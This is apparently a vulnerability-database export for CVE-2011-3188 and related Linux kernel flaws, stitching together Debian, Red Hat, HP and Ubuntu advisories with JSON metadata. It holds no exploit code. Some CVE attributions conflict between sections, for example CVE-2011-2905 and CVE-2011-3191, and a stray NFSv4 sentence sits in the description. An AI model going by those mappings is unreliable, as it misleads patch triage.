      {
        "db": "VULHUB",
        "id": "VHN-29300"
      },
      {
        "db": "BID",
        "id": "26842"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-001139"
      },
      {
        "db": "PACKETSTORM",
        "id": "64302"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-5938"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200712-062"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2007-12-06T00:00:00",
        "db": "VULHUB",
        "id": "VHN-29300"
      },
      {
        "date": "2007-12-12T00:00:00",
        "db": "BID",
        "id": "26842"
      },
      {
        "date": "2008-03-21T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2007-001139"
      },
      {
        "date": "2008-03-12T17:55:23",
        "db": "PACKETSTORM",
        "id": "64302"
      },
      {
        "date": "2007-12-06T15:46:00",
        "db": "NVD",
        "id": "CVE-2007-5938"
      },
      {
        "date": "2007-12-06T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200712-062"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-09-29T00:00:00",
        "db": "VULHUB",
        "id": "VHN-29300"
      },
      {
        "date": "2008-03-05T17:42:00",
        "db": "BID",
        "id": "26842"
      },
      {
        "date": "2008-10-30T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2007-001139"
      },
      {
        "date": "2023-11-07T02:01:24.580000",
        "db": "NVD",
        "id": "CVE-2007-5938"
      },
      {
        "date": "2007-12-06T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200712-062"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200712-062"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Intel iwlwifi of  iwl_set_rate() Service disruption in functions  (DoS) Vulnerabilities",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-001139"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "digital error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200712-062"
      }
    ],
    "trust": 0.6
  }
}

var-201205-0016
Vulnerability from variot

The (1) IPv4 and (2) IPv6 implementations in the Linux kernel before 3.1 use a modified MD4 algorithm to generate sequence numbers and Fragment Identification values, which makes it easier for remote attackers to cause a denial of service (disrupted networking) or hijack network sessions by predicting these values and sending crafted packets. The NFSv4 implementation is one of the distributed file system protocols. The Common Vulnerabilities and Exposures project identifies the following problems:

CVE-2009-4067

Rafael Dominguez Vega of MWR InfoSecurity reported an issue in the auerswald
module, a driver for Auerswald PBX/System Telephone USB devices.  Attackers
with physical access to a system's USB ports could obtain elevated
privileges using a specially crafted USB device.

CVE-2011-0712

Rafael Dominguez Vega of MWR InfoSecurity reported an issue in the caiaq
module, a USB driver for Native Instruments USB audio devices. Attackers
with physical access to a system's USB ports could obtain elevated
privileges using a specially crafted USB device.

CVE-2011-1020

Kees Cook discovered an issue in the /proc filesystem that allows local
users to gain access to sensitive process information after execution of a
setuid binary.

CVE-2011-2209

Dan Rosenberg discovered an issue in the osf_sysinfo() system call on the
alpha architecture. Local users could obtain access to sensitive kernel
memory.

CVE-2011-2211

Dan Rosenberg discovered an issue in the osf_wait4() system call on the
alpha architecture permitting local users to gain elevated privileges.

CVE-2011-2213

Dan Rosenberg discovered an issue in the INET socket monitoring interface.

CVE-2011-2484

Vasiliy Kulikov of Openwall discovered that the number of exit handlers that
a process can register is not capped, resulting in local denial of service
through resource exhaustion (cpu time and memory).

CVE-2011-2491

Vasily Averin discovered an issue with the NFS locking implementation.  A
malicious NFS server can cause a client to hang indefinitely in an unlock
call.

CVE-2011-2492

Marek Kroemeke and Filip Palian discovered that uninitialized struct
elements in the Bluetooth subsystem could lead to a leak of sensitive kernel
memory through leaked stack memory.

CVE-2011-2497

Dan Rosenberg discovered an integer underflow in the Bluetooth subsystem,
which could lead to denial of service or privilege escalation.

CVE-2011-2525

Ben Pfaff reported an issue in the network scheduling code.

CVE-2011-2928

Timo Warns discovered that insufficient validation of Be filesystem images
could lead to local denial of service if a malformed filesystem image is
mounted.

CVE-2011-3188

Dan Kaminsky reported a weakness of the sequence number generation in the
TCP protocol implementation. This can be used by remote attackers to inject
packets into an active session.

This update also includes a fix for a regression introduced with the previous security fix for CVE-2011-1768 (Debian: #633738)

For the oldstable distribution (lenny), this problem has been fixed in version 2.6.26-26lenny4. Updates for arm and alpha are not yet available, but will be released as soon as possible. Updates for the hppa and ia64 architectures will be included in the upcoming 5.0.9 point release.

The following matrix lists additional source packages that were rebuilt for compatibility with or to take advantage of this update:

                                         Debian 5.0 (lenny)
 user-mode-linux                         2.6.26-1um-2+26lenny4

We recommend that you upgrade your linux-2.6 and user-mode-linux packages. However, given the high frequency at which low-severity security issues are discovered in the kernel and the resource requirements of doing an update, updates for lower priority issues will normally not be released for all kernels at the same time. Rather, they will be released in a staggered or "leap-frog" fashion. Note: To correct this issue, the RHSA-2011:1241 ecryptfs-utils update must also be installed. (CVE-2011-2496, Moderate)

  • GRO (Generic Receive Offload) fields could be left in an inconsistent state. GRO is enabled by default in all network drivers that support it. (CVE-2011-2723, Moderate)

  • RHSA-2011:1065 introduced a regression in the Ethernet bridge implementation. Xen hypervisor and KVM (Kernel-based Virtual Machine) hosts often deploy bridge interfaces. (CVE-2011-2942, Moderate)

  • A flaw in the Xen hypervisor IOMMU error handling implementation could allow a privileged guest user, within a guest operating system that has direct control of a PCI device, to cause performance degradation on the host and possibly cause it to hang. The Ubuntu Security Team acknowledges Vasiliy Kulikov of Openwall and Dan Rosenberg as the original reporters of CVE-2011-1833. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

===================================================================== Red Hat Security Advisory

Synopsis: Important: kernel security and bug fix update Advisory ID: RHSA-2011:1465-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2011-1465.html Issue date: 2011-11-22 CVE Names: CVE-2011-1162 CVE-2011-1577 CVE-2011-2494 CVE-2011-2699 CVE-2011-2905 CVE-2011-3188 CVE-2011-3191 CVE-2011-3353 CVE-2011-3359 CVE-2011-3363 CVE-2011-3593 CVE-2011-4326 =====================================================================

  1. Summary:

Updated kernel packages that fix multiple security issues and various bugs are now available for Red Hat Enterprise Linux 6.

The Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.

  1. Relevant releases/architectures:

Red Hat Enterprise Linux Desktop (v. 6) - i386, noarch, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - noarch, x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, noarch, ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, noarch, x86_64

  1. Description:

The kernel packages contain the Linux kernel, the core of any Linux operating system.

This update fixes the following security issues:

  • IPv6 fragment identification value generation could allow a remote attacker to disrupt a target system's networking, preventing legitimate users from accessing its services. (CVE-2011-2699, Important)

  • A signedness issue was found in the Linux kernel's CIFS (Common Internet File System) implementation. A malicious CIFS server could send a specially-crafted response to a directory read request that would result in a denial of service or privilege escalation on a system that has a CIFS share mounted. (CVE-2011-3191, Important)

  • A flaw was found in the way the Linux kernel handled fragmented IPv6 UDP datagrams over the bridge with UDP Fragmentation Offload (UFO) functionality on. A remote attacker could use this flaw to cause a denial of service. (CVE-2011-4326, Important)

  • The way IPv4 and IPv6 protocol sequence numbers and fragment IDs were generated could allow a man-in-the-middle attacker to inject packets and possibly hijack connections. Protocol sequence numbers and fragment IDs are now more random. (CVE-2011-3188, Moderate)

  • A buffer overflow flaw was found in the Linux kernel's FUSE (Filesystem in Userspace) implementation. A local user in the fuse group who has access to mount a FUSE file system could use this flaw to cause a denial of service. (CVE-2011-3353, Moderate)

  • A flaw was found in the b43 driver in the Linux kernel. If a system had an active wireless interface that uses the b43 driver, an attacker able to send a specially-crafted frame to that interface could cause a denial of service. (CVE-2011-3359, Moderate)

  • A flaw was found in the way CIFS shares with DFS referrals at their root were handled. An attacker on the local network who is able to deploy a malicious CIFS server could create a CIFS network share that, when mounted, would cause the client system to crash. (CVE-2011-3363, Moderate)

  • A flaw was found in the way the Linux kernel handled VLAN 0 frames with the priority tag set. When using certain network drivers, an attacker on the local network could use this flaw to cause a denial of service. (CVE-2011-3593, Moderate)

  • A flaw in the way memory containing security-related data was handled in tpm_read() could allow a local, unprivileged user to read the results of a previously run TPM command. (CVE-2011-1162, Low)

  • A heap overflow flaw was found in the Linux kernel's EFI GUID Partition Table (GPT) implementation. A local attacker could use this flaw to cause a denial of service by mounting a disk that contains specially-crafted partition tables. (CVE-2011-1577, Low)

  • The I/O statistics from the taskstats subsystem could be read without any restrictions. A local, unprivileged user could use this flaw to gather confidential information, such as the length of a password used in a process. (CVE-2011-2494, Low)

  • It was found that the perf tool, a part of the Linux kernel's Performance Events implementation, could load its configuration file from the current working directory. If a local user with access to the perf tool were tricked into running perf in a directory that contains a specially-crafted configuration file, it could cause perf to overwrite arbitrary files and directories accessible to that user. (CVE-2011-2905, Low)

Red Hat would like to thank Fernando Gont for reporting CVE-2011-2699; Darren Lavender for reporting CVE-2011-3191; Dan Kaminsky for reporting CVE-2011-3188; Yogesh Sharma for reporting CVE-2011-3363; Gideon Naim for reporting CVE-2011-3593; Peter Huewe for reporting CVE-2011-1162; Timo Warns for reporting CVE-2011-1577; and Vasiliy Kulikov of Openwall for reporting CVE-2011-2494.

This update also fixes various bugs. Documentation for these changes will be available shortly from the Technical Notes document linked to in the References section.

  1. Solution:

Users should upgrade to these updated packages, which contain backported patches to correct these issues, and fix the bugs noted in the Technical Notes. The system must be rebooted for this update to take effect.

Before applying this update, make sure all previously-released errata relevant to your system have been applied.

This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/kb/docs/DOC-11259

To install kernel packages manually, use "rpm -ivh [package]". Do not use "rpm -Uvh" as that will remove the running kernel binaries from your system. You may use "rpm -e" to remove old kernels after determining that the new kernel functions properly on your system.

  1. Bugs fixed (http://bugzilla.redhat.com/):

695976 - CVE-2011-1577 kernel: corrupted GUID partition tables can cause kernel oops 716842 - CVE-2011-2494 kernel: taskstats io infoleak 723429 - CVE-2011-2699 kernel: ipv6: make fragment identifications less predictable 729808 - CVE-2011-2905 kernel: perf tools: may parse user-controlled configuration file 732629 - CVE-2011-1162 kernel: tpm: infoleak 732658 - CVE-2011-3188 kernel: net: improve sequence number generation 732869 - CVE-2011-3191 kernel: cifs: signedness issue in CIFSFindNext() 736761 - CVE-2011-3353 kernel: fuse: check size of FUSE_NOTIFY_INVAL_ENTRY message 738202 - CVE-2011-3359 kernel: b43: allocate receive buffers big enough for max frame len + offset 738291 - CVE-2011-3363 kernel: cifs: always do is_path_accessible check in cifs_mount 740352 - make guest mode entry to be rcu quiescent state [rhel-6.1.z] 741166 - enclosure fix [rhel-6.1.z] 742846 - CVE-2011-3593 kernel: vlan: fix panic when handling priority tagged frames 743807 - igb: failed to activate WOL on 2nd LAN port on i350 [rhel-6.1.z] 744811 - Non-responsive scsi target leads to excessive scsi recovery and dm-mp failover time [rhel-6.1.z] 748808 - Host got crash when guest running netperf client with UDP_STREAM protocol with IPV6 [rhel-6.1.z] 755584 - CVE-2011-4326 kernel: wrong headroom check in udp6_ufo_fragment()

  1. Package List:

Red Hat Enterprise Linux Desktop (v. 6):

Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/kernel-2.6.32-131.21.1.el6.src.rpm

i386: kernel-2.6.32-131.21.1.el6.i686.rpm kernel-debug-2.6.32-131.21.1.el6.i686.rpm kernel-debug-debuginfo-2.6.32-131.21.1.el6.i686.rpm kernel-debug-devel-2.6.32-131.21.1.el6.i686.rpm kernel-debuginfo-2.6.32-131.21.1.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-131.21.1.el6.i686.rpm kernel-devel-2.6.32-131.21.1.el6.i686.rpm kernel-headers-2.6.32-131.21.1.el6.i686.rpm perf-2.6.32-131.21.1.el6.i686.rpm perf-debuginfo-2.6.32-131.21.1.el6.i686.rpm

noarch: kernel-doc-2.6.32-131.21.1.el6.noarch.rpm kernel-firmware-2.6.32-131.21.1.el6.noarch.rpm

x86_64: kernel-2.6.32-131.21.1.el6.x86_64.rpm kernel-debug-2.6.32-131.21.1.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-131.21.1.el6.x86_64.rpm kernel-debug-devel-2.6.32-131.21.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-131.21.1.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-131.21.1.el6.x86_64.rpm kernel-devel-2.6.32-131.21.1.el6.x86_64.rpm kernel-headers-2.6.32-131.21.1.el6.x86_64.rpm perf-2.6.32-131.21.1.el6.x86_64.rpm perf-debuginfo-2.6.32-131.21.1.el6.x86_64.rpm

Red Hat Enterprise Linux HPC Node (v. 6):

Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/kernel-2.6.32-131.21.1.el6.src.rpm

noarch: kernel-doc-2.6.32-131.21.1.el6.noarch.rpm kernel-firmware-2.6.32-131.21.1.el6.noarch.rpm

x86_64: kernel-2.6.32-131.21.1.el6.x86_64.rpm kernel-debug-2.6.32-131.21.1.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-131.21.1.el6.x86_64.rpm kernel-debug-devel-2.6.32-131.21.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-131.21.1.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-131.21.1.el6.x86_64.rpm kernel-devel-2.6.32-131.21.1.el6.x86_64.rpm kernel-headers-2.6.32-131.21.1.el6.x86_64.rpm perf-2.6.32-131.21.1.el6.x86_64.rpm perf-debuginfo-2.6.32-131.21.1.el6.x86_64.rpm

Red Hat Enterprise Linux Server (v. 6):

Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/kernel-2.6.32-131.21.1.el6.src.rpm

i386: kernel-2.6.32-131.21.1.el6.i686.rpm kernel-debug-2.6.32-131.21.1.el6.i686.rpm kernel-debug-debuginfo-2.6.32-131.21.1.el6.i686.rpm kernel-debug-devel-2.6.32-131.21.1.el6.i686.rpm kernel-debuginfo-2.6.32-131.21.1.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-131.21.1.el6.i686.rpm kernel-devel-2.6.32-131.21.1.el6.i686.rpm kernel-headers-2.6.32-131.21.1.el6.i686.rpm perf-2.6.32-131.21.1.el6.i686.rpm perf-debuginfo-2.6.32-131.21.1.el6.i686.rpm

noarch: kernel-doc-2.6.32-131.21.1.el6.noarch.rpm kernel-firmware-2.6.32-131.21.1.el6.noarch.rpm

ppc64: kernel-2.6.32-131.21.1.el6.ppc64.rpm kernel-bootwrapper-2.6.32-131.21.1.el6.ppc64.rpm kernel-debug-2.6.32-131.21.1.el6.ppc64.rpm kernel-debug-debuginfo-2.6.32-131.21.1.el6.ppc64.rpm kernel-debug-devel-2.6.32-131.21.1.el6.ppc64.rpm kernel-debuginfo-2.6.32-131.21.1.el6.ppc64.rpm kernel-debuginfo-common-ppc64-2.6.32-131.21.1.el6.ppc64.rpm kernel-devel-2.6.32-131.21.1.el6.ppc64.rpm kernel-headers-2.6.32-131.21.1.el6.ppc64.rpm perf-2.6.32-131.21.1.el6.ppc64.rpm perf-debuginfo-2.6.32-131.21.1.el6.ppc64.rpm

s390x: kernel-2.6.32-131.21.1.el6.s390x.rpm kernel-debug-2.6.32-131.21.1.el6.s390x.rpm kernel-debug-debuginfo-2.6.32-131.21.1.el6.s390x.rpm kernel-debug-devel-2.6.32-131.21.1.el6.s390x.rpm kernel-debuginfo-2.6.32-131.21.1.el6.s390x.rpm kernel-debuginfo-common-s390x-2.6.32-131.21.1.el6.s390x.rpm kernel-devel-2.6.32-131.21.1.el6.s390x.rpm kernel-headers-2.6.32-131.21.1.el6.s390x.rpm kernel-kdump-2.6.32-131.21.1.el6.s390x.rpm kernel-kdump-debuginfo-2.6.32-131.21.1.el6.s390x.rpm kernel-kdump-devel-2.6.32-131.21.1.el6.s390x.rpm perf-2.6.32-131.21.1.el6.s390x.rpm perf-debuginfo-2.6.32-131.21.1.el6.s390x.rpm

x86_64: kernel-2.6.32-131.21.1.el6.x86_64.rpm kernel-debug-2.6.32-131.21.1.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-131.21.1.el6.x86_64.rpm kernel-debug-devel-2.6.32-131.21.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-131.21.1.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-131.21.1.el6.x86_64.rpm kernel-devel-2.6.32-131.21.1.el6.x86_64.rpm kernel-headers-2.6.32-131.21.1.el6.x86_64.rpm perf-2.6.32-131.21.1.el6.x86_64.rpm perf-debuginfo-2.6.32-131.21.1.el6.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 6):

Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/kernel-2.6.32-131.21.1.el6.src.rpm

i386: kernel-2.6.32-131.21.1.el6.i686.rpm kernel-debug-2.6.32-131.21.1.el6.i686.rpm kernel-debug-debuginfo-2.6.32-131.21.1.el6.i686.rpm kernel-debug-devel-2.6.32-131.21.1.el6.i686.rpm kernel-debuginfo-2.6.32-131.21.1.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-131.21.1.el6.i686.rpm kernel-devel-2.6.32-131.21.1.el6.i686.rpm kernel-headers-2.6.32-131.21.1.el6.i686.rpm perf-2.6.32-131.21.1.el6.i686.rpm perf-debuginfo-2.6.32-131.21.1.el6.i686.rpm

noarch: kernel-doc-2.6.32-131.21.1.el6.noarch.rpm kernel-firmware-2.6.32-131.21.1.el6.noarch.rpm

x86_64: kernel-2.6.32-131.21.1.el6.x86_64.rpm kernel-debug-2.6.32-131.21.1.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-131.21.1.el6.x86_64.rpm kernel-debug-devel-2.6.32-131.21.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-131.21.1.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-131.21.1.el6.x86_64.rpm kernel-devel-2.6.32-131.21.1.el6.x86_64.rpm kernel-headers-2.6.32-131.21.1.el6.x86_64.rpm perf-2.6.32-131.21.1.el6.x86_64.rpm perf-debuginfo-2.6.32-131.21.1.el6.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package

  1. References:

https://www.redhat.com/security/data/cve/CVE-2011-1162.html https://www.redhat.com/security/data/cve/CVE-2011-1577.html https://www.redhat.com/security/data/cve/CVE-2011-2494.html https://www.redhat.com/security/data/cve/CVE-2011-2699.html https://www.redhat.com/security/data/cve/CVE-2011-2905.html https://www.redhat.com/security/data/cve/CVE-2011-3188.html https://www.redhat.com/security/data/cve/CVE-2011-3191.html https://www.redhat.com/security/data/cve/CVE-2011-3353.html https://www.redhat.com/security/data/cve/CVE-2011-3359.html https://www.redhat.com/security/data/cve/CVE-2011-3363.html https://www.redhat.com/security/data/cve/CVE-2011-3593.html https://www.redhat.com/security/data/cve/CVE-2011-4326.html https://access.redhat.com/security/updates/classification/#important https://docs.redhat.com/docs/en-US/Red_Hat_Enterprise_Linux/6/html/6.1_Technical_Notes/kernel.html#RHSA-2011-1465

  1. Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2011 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux)

iD8DBQFOy9KxXlSAg2UNWIIRApHRAKCrfJt7aIrWnGPf3TwUZKtul/8YUgCgtpZE l5BuL6rArAsWl76KlBJjWFw= =0G9b -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04135307

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04135307 Version: 1

HPSBGN02970 rev.1 - HP Rapid Deployment Pack (RDP) or HP Insight Control Server Deployment, Multiple Remote Vulnerabilities affecting Confidentiality, Integrity and Availability

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2014-03-10 Last Updated: 2014-03-10

Potential Security Impact: Multiple remote vulnerabilities affecting confidentiality, integrity and availability

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY Potential vulnerabilities have been identified with HP Rapid Deployment Pack (RDP) or HP Insight Control Server Deployment. The vulnerabilities could be exploited remotely affecting confidentiality, integrity and availability.

References: CVE-2010-4008 CVE-2010-4494 CVE-2011-2182 CVE-2011-2213 CVE-2011-2492

CVE-2011-2518 CVE-2011-2689 CVE-2011-2723 CVE-2011-3188 CVE-2011-4077

CVE-2011-4110 CVE-2012-0058 CVE-2012-0879 CVE-2012-1088 CVE-2012-1179

CVE-2012-2137 CVE-2012-2313 CVE-2012-2372 CVE-2012-2373 CVE-2012-2375

CVE-2012-2383 CVE-2012-2384 CVE-2013-6205 CVE-2013-6206 SSRT101443

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

HP Rapid Deployment Pack (RDP) -- All versions HP Insight Control Server Deployment -- All versions

BACKGROUND

CVSS 2.0 Base Metrics

Reference Base Vector Base Score CVE-2013-6205 (AV:L/AC:M/Au:S/C:P/I:P/A:P) 4.1 CVE-2013-6206 (AV:N/AC:L/Au:N/C:C/I:P/A:P) 9.0 CVE-2010-4008 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2010-4494 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2011-2182 (AV:L/AC:L/Au:N/C:C/I:C/A:C) 7.2 CVE-2011-2213 (AV:L/AC:L/Au:N/C:N/I:N/A:C) 4.9 CVE-2011-2492 (AV:L/AC:M/Au:N/C:P/I:N/A:N) 1.9 CVE-2011-2518 (AV:L/AC:L/Au:N/C:N/I:N/A:C) 4.9 CVE-2011-2689 (AV:L/AC:L/Au:N/C:N/I:N/A:C) 4.9 CVE-2011-2723 (AV:A/AC:M/Au:N/C:N/I:N/A:C) 5.7 CVE-2011-3188 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2011-4077 (AV:L/AC:M/Au:N/C:C/I:C/A:C) 6.9 CVE-2011-4110 (AV:L/AC:L/Au:N/C:N/I:N/A:P) 2.1 CVE-2012-0058 (AV:L/AC:L/Au:N/C:N/I:N/A:C) 4.9 CVE-2012-0879 (AV:L/AC:L/Au:N/C:N/I:N/A:C) 4.9 CVE-2012-1088 (AV:L/AC:M/Au:N/C:N/I:P/A:P) 3.3 CVE-2012-1179 (AV:A/AC:M/Au:S/C:N/I:N/A:C) 5.2 CVE-2012-2137 (AV:L/AC:M/Au:N/C:C/I:C/A:C) 6.9 CVE-2012-2313 (AV:L/AC:H/Au:N/C:N/I:N/A:P) 1.2 CVE-2012-2372 (AV:L/AC:M/Au:S/C:N/I:N/A:C) 4.4 CVE-2012-2373 (AV:L/AC:H/Au:N/C:N/I:N/A:C) 4.0 CVE-2012-2375 (AV:A/AC:H/Au:N/C:N/I:N/A:C) 4.6 CVE-2012-2383 (AV:L/AC:L/Au:N/C:N/I:N/A:C) 4.9 CVE-2012-2384 (AV:L/AC:L/Au:N/C:N/I:N/A:C) 4.9 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP recommends that HP Rapid Deployment Pack (RDP) or HP Insight Control Server Deployment should only be run on private secure networks to prevent the risk of security compromise.

HISTORY Version:1 (rev.1) - 10 March 2014 Initial release

Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.

Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.

3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX

Copyright 2014 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.

Software Description: - linux-mvl-dove: Linux kernel for DOVE

Details:

Ryan Sweat discovered that the kernel incorrectly handled certain VLAN packets. (CVE-2011-1833)

Vasiliy Kulikov discovered that taskstats did not enforce access restrictions. A local attacker could exploit this to read certain information, leading to a loss of privacy. (CVE-2011-2494)

Vasiliy Kulikov discovered that /proc/PID/io did not enforce access restrictions. A local attacker could exploit this to read certain information, leading to a loss of privacy. (CVE-2011-2497)

It was discovered that the EXT4 filesystem contained multiple off-by-one flaws. (CVE-2011-2695)

Fernando Gont discovered that the IPv6 stack used predictable fragment identification numbers. (CVE-2011-2905)

Time Warns discovered that long symlinks were incorrectly handled on Be filesystems. A remote attacker with a malicious server could exploit this to crash the system or possibly execute arbitrary code as the root user. (CVE-2011-3191)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 10.04 LTS: linux-image-2.6.32-219-dove 2.6.32-219.37

After a standard system update you need to reboot your computer to make all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-server, linux-powerpc), a standard system upgrade will automatically perform this as well

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201205-0016",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "big-ip local traffic manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "10.0.0"
      },
      {
        "model": "firepass",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "6.0.0"
      },
      {
        "model": "big-ip wan optimization manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "big-ip local traffic manager",
        "scope": "gte",
        "trust": 1.0,
